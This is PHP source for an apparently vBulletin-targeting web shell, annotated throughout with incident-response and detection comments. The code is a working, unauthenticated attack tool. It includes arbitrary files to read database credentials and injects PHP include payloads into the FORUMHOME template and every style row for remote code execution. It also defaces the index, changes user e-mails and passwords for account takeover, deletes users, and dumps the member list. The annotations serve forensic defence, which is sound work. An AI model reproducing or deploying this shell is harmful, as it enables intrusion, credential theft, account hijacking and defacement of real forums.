/*
 * Top-level dispatcher of a browser-driven forum-database tool: the `act` query
 * parameter selects a branch and POST fields supply every other value. None of the
 * branches visible in this listing checks a session, token or caller identity, so
 * anyone who can reach the file can drive it.
 * NOTE(review): opening PHP tags and HTML markup appear to have been stripped from
 * this listing; label text and closing-tag fragments therefore sit inline with code.
 *
 * act=reconfig: passes $_POST['path'] straight to `include`, then prints
 * $config['MasterServer'] servername/username/password and
 * $config['Database']['dbname'] as defined by the included file. That key layout
 * looks like a vBulletin config.php -- confirm against the affected install.
 *
 * Incident response: if this file is found on a host, treat the database
 * credentials in any config file the web-server account can read as disclosed and
 * rotate them. Requests carrying `act=reconfig` in the query string are the
 * access-log trace of this branch; the POSTed path itself is normally not logged.
 */
$act = $_GET['act']; if($act=='reconfig' && isset($_POST['path'])) { $path = $_POST['path']; include $path; ?>
::::Read Config Data:::: echo '' . $path . ''; ?>
Host : echo '' . $config['MasterServer']['servername'] . ''; ?>
User : echo '' . $config['MasterServer']['username'] . ''; ?>
Pass : $passsql = $config['MasterServer']['password']; if ($passsql == '') { $result = 'No Password'; } else { $result = '' . $passsql . ''; } echo $result; ?>
Name : echo '' . $config['Database']['dbname'] . ''; ?>
// The leading brace closes the act=reconfig branch.
// act=del: requires POST host, user, pass, db and vbuser. Like every database
// branch in this file it connects with caller-supplied credentials through the
// legacy mysql_* API (removed in PHP 7.0, so the script needs PHP 5.x or a
// compatibility shim) and echoes host, user and password back in the response.
// Detection: the literals 'Nope,No cOnnection with user', 'Nope,No cOnnection with DB'
// and 'You are connected with the mysql server of ' recur in each database branch
// and serve as stable content-signature strings when scanning web roots.
} if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="del" && isset($_POST['vbuser']) ) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
// Builds a DELETE against the `user` table by concatenating $_POST['vbuser'] into
// the SQL text with no escaping, then reports the outcome. The statement after the
// closing brace opens act=shell (POST host, user, pass, db, var) with the same
// connect-and-banner preamble.
$query = 'delete * from user where username="' . $vbuser . '";'; $r = mysql_query($query); if ($r) { echo 'User : ' . $vbuser . ' was deleted'; } else { echo 'User : ' . $vbuser . ' could not be deleted'; } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="shell" && isset($_POST['var'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $var = $_POST['var']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
// act=shell body. Two UPDATE statements store a PHP `include` expression, keyed on
// the request variable named by $_POST['var'], in
//   - `template`.`template` for the row titled FORUMHOME, and
//   - `style`.`css`; this statement has no WHERE clause, so every `style` row is
//     overwritten and stylevars, csscolors and editorstyles are blanked.
// NOTE(review): presumably this relies on the forum evaluating stored template
// text as PHP when rendering -- confirm for the product and version in question.
// Incident response: compare `template` (title = 'FORUMHOME') and `style` against
// a known-good backup and search both columns for `include(`; style columns
// blanked across all rows are a visible side effect of this branch.
// The last line of this span closes act=shell and opens act=code (POST host,
// user, pass, db, code) with the same connect-and-banner preamble.
$Wdt = 'UPDATE `template` SET `template` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \'WHERE `title` =\'FORUMHOME\';'; $Wdt2= 'UPDATE `style` SET `css` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;'; $result=mysql_query($Wdt); if ($result) {echo "

Done Exploit.


Use this :
index.php?" . $var . "=shell.txt";}else{ echo "

Error

";} $result1=mysql_query($Wdt2); if ($result1) { echo "

Done Create File


Use this :
index.php?" . $var . "=shell.txt";} else{ echo "

Error

";} } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="code" && isset($_POST['code'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $index = $_POST['code']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
// act=code body. $index is reassigned from $_POST['b'] and written verbatim, with
// no escaping, into `template`.`template` (title FORUMHOME) and into `style`.`css`.
// The second UPDATE has no WHERE clause: all `style` rows are overwritten and
// stylevars, csscolors and editorstyles are blanked.
// Incident response: the tool's own messages call this an "index" change, so an
// altered FORUMHOME template together with wiped style settings matches this
// branch; restore both tables from a known-good backup.
// The last line of this span closes act=code and opens act=inc (POST host, user,
// pass, db, link) with the same connect-and-banner preamble.
$index = $_POST['b']; $Wdt = 'UPDATE `template` SET `template` = \' ' . $index . ' \'WHERE `title` =\'FORUMHOME\';'; $Wdt2= 'UPDATE `style` SET `css` = \' ' . $index . ' \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;'; $result=mysql_query($Wdt); if ($result) {echo "

Index was Changed Succefully

";}else{ echo "

Failed to change index

";} $result1=mysql_query($Wdt2); if ($result1) {echo "

Done Create File

";} else{ echo "

Error

";} } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="inc" && isset($_POST['link'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vblink = $_POST['link']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
// act=inc body. Both UPDATEs embed $_POST['link'] inside an
// `{${include(...)}}{${exit()}}` expression and store it in `template`.`template`
// (title FORUMHOME) and in `style`.`css` (no WHERE clause, so all rows; the other
// style columns are blanked). Either query failing aborts with mysql_error().
// Detection: the sequences `{${include(` and `{${exit()}}` in either column are
// high-confidence indicators when auditing the forum database.
// After the closing brace, act=mail starts (POST host, user, pass, db, vbuser,
// vbmail) with the same connect-and-banner preamble.
$hack15 = 'UPDATE `template` SET `template` = \'$spacer_open {${include(\'\'' . $vblink . '\'\')}}{${exit()}}& $_phpinclude_output\'WHERE `title` =\'FORUMHOME\';'; $hack= 'UPDATE `style` SET `css` = \'$spacer_open {${include(\'\'' . $vblink .'\'\')}}{${exit()}}& $_phpinclude_output\', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;'; $result=mysql_query($hack15) or die(mysql_error()); $result=mysql_query($hack) or die(mysql_error()); } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="mail" && isset($_POST['vbuser']) && isset($_POST['vbmail'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; $vbmail = $_POST['vbmail']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
// act=mail body: sets `user`.`email` to $_POST['vbmail'] for the row whose
// username equals $_POST['vbuser']; both values are concatenated into the SQL
// text unescaped.
// Incident response: check `user`.`email` of privileged accounts against a
// backup, since a changed address redirects any mail the forum sends to that
// account.
// The last line of this span closes act=mail and opens act=psw (POST host, user,
// pass, db, vbuser, vbpass) with the same connect-and-banner preamble.
$query = 'update user set email="' . $vbmail . '" where username="' . $vbuser . '";'; $re = mysql_query($query); if ($re) { echo 'The E-MAIL of the user ' . $vbuser . ' was changed to ' . $vbmail . '
Back to Shell
'; } else { echo 'Failed to change E-MAIL'; } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset($_POST['vbuser']) && isset($_POST['vbpass'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; $vbpass = $_POST['vbpass']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
// act=psw body: reads the `user` row(s) matching $_POST['vbuser'], computes
// md5(md5($vbpass) . salt) with each row's `salt`, and stores the result in
// `user`.`password`. The new clear-text password is echoed back in the response.
// Incident response: a `password` value that differs from the last backup with no
// matching password-change event in the forum's own records points at a direct
// database write such as this one; reset the affected accounts.
// The last line of this span closes act=psw and opens act=login (POST host, user,
// pass, db), which only connects, prints the banner and renders the action menu.
$query = 'select * from user where username="' . $vbuser . '";'; $result = mysql_query($query); while ($row = mysql_fetch_array($result)) { $salt = $row['salt']; $x = md5($vbpass); $x =$x . $salt; $pass_salt = md5($x); $query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";'; $re = mysql_query($query); if ($re) { echo 'The pass of the user ' . $vbuser . ' was changed to ' . $vbpass . '
Back to Shell
'; } else { echo 'Failed to change PassWord'; } } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login") { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
:::::Change User Password:::::
User :
Pass :
// Action menu shown by act=login: one form per action (password change, e-mail
// change, user deletion, index by inclusion, index by code, file-inclusion
// variable), as named by the section headings in this span.
// NOTE(review): each `echo'';` prints an empty literal in this listing; the markup
// it originally emitted appears to have been stripped during extraction.
echo''; ?>

:::::Change User E-MAIL:::::
User :
MAIL :
echo''; ?>

:::::Delete a user:::::
User :
echo''; ?>

:::::Change Index by Inclusion(Not PL(Al-Massya)):::::
Index Link :
echo''; ?>

:::::Change Index by Code(All Edition):::::
Index Code :
echo''; ?>

:::::Inject FileInclusion Exploit(NOT PL(AL-MASSYA)):::::
Variable :
echo''; ?>
// Closes act=login. An empty `act` shows the "DATABASE CONFIG" prompt
// (Host, User, Pass, Name) whose labels follow.
} if ($act == ''){ ?>
:::::DATABASE CONFIG:::::
Host :
User :
Pass :
Name :
// Closes the empty-act branch. act=lst requires POST user, pass, host and db and
// starts with the same connect-and-banner preamble as the other database
// branches, including the password echoed back in the response.
} if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
// act=lst body: selects every row of `user` and prints userid, username and email
// for each one. NOTE(review): the table markup was stripped from this listing, so
// the loop body and the header text appear out of their original order.
// Incident response: if this branch was reachable, treat the usernames and e-mail
// addresses of all forum members as disclosed.
$re = mysql_query('select * from user'); echo''; while ($row = mysql_fetch_array($re)) { echo''; } echo'
IDUSERNAMEEMAIL
' . $row['userid'] . '' . $row['username'] . '' . $row['email'] . '
'; ?>
// Prints the number of rows returned by the query above.
$count = mysql_num_rows($re); echo 'Number of users registered is : [ ' . $count . ' ]'; ?>
// Closes act=lst. act=users shows a "DATABASE CONFIG" prompt; only its labels
// survive in this listing.
} if ($act == 'users'){ ?>
:::::DATABASE CONFIG:::::
Host :
User :
Pass :
Name :
// Closes act=users. act=config shows the "CONFIG PATH" prompt; the PATH label
// matches the `path` field read by the act=reconfig branch.
} if ($act=='config') { ?>
:::::CONFIG PATH:::::
PATH :
// Closes act=config. act=index shows an editor whose toolbar labels follow; no
// server-side processing for it is visible in this branch.
} if ($act=='index') { // Index Editor ?>
Center ||| Left ||| right ||| Bold ||| UnderLine ||| Italic ||| NewLine ||| Colour ||| Marquee ||| Picture ||| Link

Copy The Code after Finishing your index
// Closes act=index.
} ?>
Main ShellList UsersIndex MakerReadConfig

www.tryag.com
